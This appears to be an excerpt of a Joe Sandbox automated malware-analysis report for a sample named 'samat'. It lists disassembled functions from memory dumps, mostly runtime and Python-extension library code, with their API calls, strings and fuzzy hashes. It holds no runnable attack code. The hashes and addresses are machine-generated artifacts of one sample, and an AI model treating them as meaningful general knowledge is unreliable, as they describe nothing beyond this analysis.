_set_statfp.LIBCMT ref: 00007FF7E12E93AB
_set_statfp.LIBCMT ref: 00007FF7E12E93C7
_set_statfp.LIBCMT ref: 00007FF7E12E9403

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 7da888a16346858616c46f2e1825281b0af9907d375dea920da0568e8fa27529
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: C2118922F5CA0301FF563256ECA33799258AF55360E84D637FA6FD63D68EFC58414122

Function 00007FF7E12DB390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF7E12DA5A3,?,?,00000000,00007FF7E12DA83E,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DB3AF
FlsSetValue.KERNEL32(?,?,?,00007FF7E12DA5A3,?,?,00000000,00007FF7E12DA83E,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DB3CE
FlsSetValue.KERNEL32(?,?,?,00007FF7E12DA5A3,?,?,00000000,00007FF7E12DA83E,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DB3F6
FlsSetValue.KERNEL32(?,?,?,00007FF7E12DA5A3,?,?,00000000,00007FF7E12DA83E,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DB407
FlsSetValue.KERNEL32(?,?,?,00007FF7E12DA5A3,?,?,00000000,00007FF7E12DA83E,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DB418

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 4beba02b960c9f4c122fa6b087f84ea6fe2ade67e0ecd51c72e7f47762a48d3d
Instruction ID: d42ab028b4c6c82e7e75043ef3cc9cafb51a2374711b1084feed7626b62e337f
Opcode Fuzzy Hash: 4beba02b960c9f4c122fa6b087f84ea6fe2ade67e0ecd51c72e7f47762a48d3d
Instruction Fuzzy Hash: 6D116022F0864241FB54B726ED633B99149AF457B0FC84336D82E467CADDBDE4528226

Function 00007FF7E12DB224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF7E12DB235
FlsSetValue.KERNEL32 ref: 00007FF7E12DB254
FlsSetValue.KERNEL32 ref: 00007FF7E12DB27C
FlsSetValue.KERNEL32 ref: 00007FF7E12DB28D
FlsSetValue.KERNEL32 ref: 00007FF7E12DB29E

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: cda0cba1a061c727c7e2df3b5d45acc099e2ee41b4dfcb91690057491b566149
Instruction ID: f3fc36c4f2c9f8cf0da75019a1960821875c7ac530a93af9de9d1ee1cf7523cb
Opcode Fuzzy Hash: cda0cba1a061c727c7e2df3b5d45acc099e2ee41b4dfcb91690057491b566149
Instruction Fuzzy Hash: A1113622F0820342FB687262CC277BE914A5F46335F84473AD93E0A2C6DDBDB8114237

Function 00007FF7E12D5FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D5FDC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D6106
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D61BC

Strings

verbose, xrefs: 00007FF7E12D5FB0

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: 0449f084a999739a1ea63e0c6ec76723555590a9e7e7d8026b7d5408e26b1d21
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 0B91D233B0864681F760AE24DC5277DB7A9AB44B94FC44133DA6D473D5DEBDE4058322

Function 00007FF7E12DFBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12DFEA7

Part of subcall function 00007FF7E12D7A3C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D7A59

Strings

UTF-8, xrefs: 00007FF7E12DFE26
UTF-16LEUNICODE, xrefs: 00007FF7E12DFE45
ccs, xrefs: 00007FF7E12DFDE2

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction ID: 1bde7abaf74e265acf9910cc2706a8260ceb2c6d66cd1714166ae8b7dbc88686
Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction Fuzzy Hash: 0B819673F0824285E764BF25C9023B8B6A89B15B4CFD54037CA1997295CBBDE503932F

Function 00007FF7E12CD648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7E12CD673
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF7E12CD70A
RtlUnwindEx.KERNEL32 ref: 00007FF7E12CD764

Strings

csm, xrefs: 00007FF7E12CD6F1

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction ID: a41aad11e155a191a89aba095d5a602d812d26114f03c9bc50745866e9447eee
Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction Fuzzy Hash: 9051D032B196468BDB18EB15E805B39B399EB44B88F908132DB4E57744DFBCE841C791

Function 00007FF7E12CF288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7E12CF2B0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF7E12CF398

Strings

csm, xrefs: 00007FF7E12CF3EA
csm, xrefs: 00007FF7E12CF2D2

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction ID: 7dca480201d23c5cc3b86cc1976281541331fd4fa52ef37d07f15c7c6497111e
Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction Fuzzy Hash: 7E519072B0868286EB74AB21D8463A8F7A8FB55B84F944137DB4C43B85CFBCE450C716

Function 00007FF7E12CEED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF7E12CEF37
_CallSETranslator.LIBVCRUNTIME ref: 00007FF7E12CEF83

Strings

MOC, xrefs: 00007FF7E12CEF4B
RCC, xrefs: 00007FF7E12CEF53

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction ID: 4f4acf3db6a1496d3ccb50d3957312152144630ee5cc2409c2be93bbd7d7be7a
Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction Fuzzy Hash: 4461A532A08BC586D730AB15E8413EAF7A4FB85B84F444226EB9C13B59DFBCD190CB11

Function 00007FF7E12C7E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF7E12C352C,?,00000000,00007FF7E12C3F23), ref: 00007FF7E12C7F32

Strings

%.*s, xrefs: 00007FF7E12C7EEB
\, xrefs: 00007FF7E12C7E97
%s%c, xrefs: 00007FF7E12C7EA4

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
Instruction ID: 9a4e7b05101842aef7faa12c2d713a7c4cedb021190bbde38b64aaf5e32ed831
Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
Instruction Fuzzy Hash: 1431C321719AC645EB61AB20EC523EAA258EF84BE0F844232EB6D477C9DE7CD601C711

Function 00007FF8B7E89FA0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E8A010
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8A09D

Strings

iiiiiiiii|i, xrefs: 00007FF8B7E8A009
year out of range, xrefs: 00007FF8B7E8A093

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_Err_ParseStringTuple
String ID: iiiiiiiii|i$year out of range
API String ID: 385655187-1001734015
Opcode ID: a393630f01c1ab398363936785eebc4b854c9c0a34006ea8152fcf8c0a72c652
Instruction ID: a6c303b62bf518a9ce2725ff93a6b0ed7f1fda7ad3fb6158596e75e14217983f
Opcode Fuzzy Hash: a393630f01c1ab398363936785eebc4b854c9c0a34006ea8152fcf8c0a72c652
Instruction Fuzzy Hash: 0B318FB2A18B4586E304CF28D4445AC33A5FB48FC4B95823ADBAD47721DF3ED9A5C740

Function 00007FF8B7E8A5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72timeCOMMON

Download Yara Rule

APIs

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF8B7E8A653
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF8B7E8A67F
VariantTimeToSystemTime.OLEAUT32 ref: 00007FF8B7E8A6BA

Strings

VariantTimeToSystemTime, xrefs: 00007FF8B7E8A6C6

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Timefloor$SystemVariant
String ID: VariantTimeToSystemTime
API String ID: 1266533630-2676162551
Opcode ID: a465e119b1e8654e6b17b5d4bd19b62b8ede92bf3e9ff217748a048bfc1d5ad1
Instruction ID: e842080da1dab50c1015e9c1da7f952adf0c2aeb2add3c008c487fe1c4f4eb84
Opcode Fuzzy Hash: a465e119b1e8654e6b17b5d4bd19b62b8ede92bf3e9ff217748a048bfc1d5ad1
Instruction Fuzzy Hash: A731B552C2CF5588E243877998510A9F3697FAABC9B448333FA4F72536EF3CA0D24600

Function 00007FF7E12C2810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF7E12C28EA

Strings

ERROR, xrefs: 00007FF7E12C286F
Error, xrefs: 00007FF7E12C28DD
[PYI-%d:%ls] , xrefs: 00007FF7E12C2868

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction ID: c20c5bac15e93646483ef002f2ef816c3de1d88c6d6b17bdf81f9a4ea31eda03
Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction Fuzzy Hash: 0921AE62B08B4182E711AB24F8467EAA3A8FB88780F804137EE8D93759DF7CD255C751

Function 00007FF8B7E8D570 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E8D5B2

Strings

The object is not a PyHANDLE object, xrefs: 00007FF8B7E8D639
OiOOi(ii):MSG param, xrefs: 00007FF8B7E8D5AB

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_ParseTuple
String ID: OiOOi(ii):MSG param$The object is not a PyHANDLE object
API String ID: 3371842430-2297966167
Opcode ID: 1aef02047203e126fbad942446429c40e2ebc0da5cb29cf657f2d8b5da010051
Instruction ID: dc29acba1d294c31470abd4c0cf8ddf284260699f6cf276b69ce27bc0dd40c22
Opcode Fuzzy Hash: 1aef02047203e126fbad942446429c40e2ebc0da5cb29cf657f2d8b5da010051
Instruction Fuzzy Hash: 7D21E772A08B0691EB018B19D4401AD63AAFF48BC4F944132DB5D472A5EE3CE996D750

Function 00007FF8B7E89120 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E89177
InitializeSid.ADVAPI32 ref: 00007FF8B7E891A5

Strings

(bbbbbb)b:Initialize, xrefs: 00007FF8B7E89155
InitializeSid, xrefs: 00007FF8B7E891B1

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_InitializeParseTuple
String ID: (bbbbbb)b:Initialize$InitializeSid
API String ID: 1991639834-750340051
Opcode ID: 8f93dc5897869b6e6d762fe8350b58cad0134a8ca8a8ee9a4feec80ce2d05c27
Instruction ID: a0c55f9974a85b6a227ca7e27b85d320a69c082726fa27bedd11a5316502db4a
Opcode Fuzzy Hash: 8f93dc5897869b6e6d762fe8350b58cad0134a8ca8a8ee9a4feec80ce2d05c27
Instruction Fuzzy Hash: 10215932B1CB4686EB40DB69E4550BD33A1BF88B84F860036DB6E47762DE3DD959C710

Function 00007FF8B7E83E8C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E83ECB
DeleteAce.ADVAPI32 ref: 00007FF8B7E83EE5

Strings

l:DeleteAce, xrefs: 00007FF8B7E83EC1
DeleteAce, xrefs: 00007FF8B7E83EF1

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_DeleteParseTuple
String ID: DeleteAce$l:DeleteAce
API String ID: 1230908747-3702189175
Opcode ID: e9fd5093a37588dd38093529aa320f1bd4afb36f3cc09021ea466ad982abeb09
Instruction ID: 3ca23b795a9d1bd7b2fc1cbf720fa132917630eee389c4003a96bcbaf36d1ceb
Opcode Fuzzy Hash: e9fd5093a37588dd38093529aa320f1bd4afb36f3cc09021ea466ad982abeb09
Instruction Fuzzy Hash: 4011F166A1978247EB464B6DA4501BD3B70AF89F84B488072DB8D82362DA3CA4A6D700

Function 00007FF8B7E84E90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON313 ref: 00007FF8B7E84EE3

Strings

DEVMODE structure of size %d greater than supported size of %d, xrefs: 00007FF8B7E84ED6

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_Format
String ID: DEVMODE structure of size %d greater than supported size of %d
API String ID: 376477240-1470040908
Opcode ID: b8ecc243b236786a1011e640928dcb070ff00ad600dd3a87fa9598167f5ce84a
Instruction ID: ee5ff3ab755ec07d9d7d71559d5b5f03fef1d17022f85acfce6428f1ddcdb8e9
Opcode Fuzzy Hash: b8ecc243b236786a1011e640928dcb070ff00ad600dd3a87fa9598167f5ce84a
Instruction Fuzzy Hash: 9D112E62E1570286FB149F5EE45427C2290EF89FC4F845035DB0D8B7B2DE3CE4918750

Function 00007FF8B7E88250 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E88266
GetSecurityDescriptorOwner.ADVAPI32 ref: 00007FF8B7E88286

Strings

:GetSecurityDescriptorOwner, xrefs: 00007FF8B7E8825F
GetSecurityDescriptorOwner, xrefs: 00007FF8B7E88292

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_DescriptorOwnerParseSecurityTuple
String ID: :GetSecurityDescriptorOwner$GetSecurityDescriptorOwner
API String ID: 2338322640-1512101531
Opcode ID: 0535b539f90f532cb0c8c7548f6890f1e389f6ab6250c068e08cb84b90928d65
Instruction ID: 194facdb46b3ee8d1ff80f1aa688226621e688f2dd35fcf0daca90811ca4ec7f
Opcode Fuzzy Hash: 0535b539f90f532cb0c8c7548f6890f1e389f6ab6250c068e08cb84b90928d65
Instruction Fuzzy Hash: 0001F762E28B0682FB549BAAA85027D22A1AF85FC4F845035DB0D477B6EE3CD995C700

Function 00007FF8B7E85240 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

Strings

CloseHandle, xrefs: 00007FF8B7E852C8
The object is not a PyHANDLE object, xrefs: 00007FF8B7E85283

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
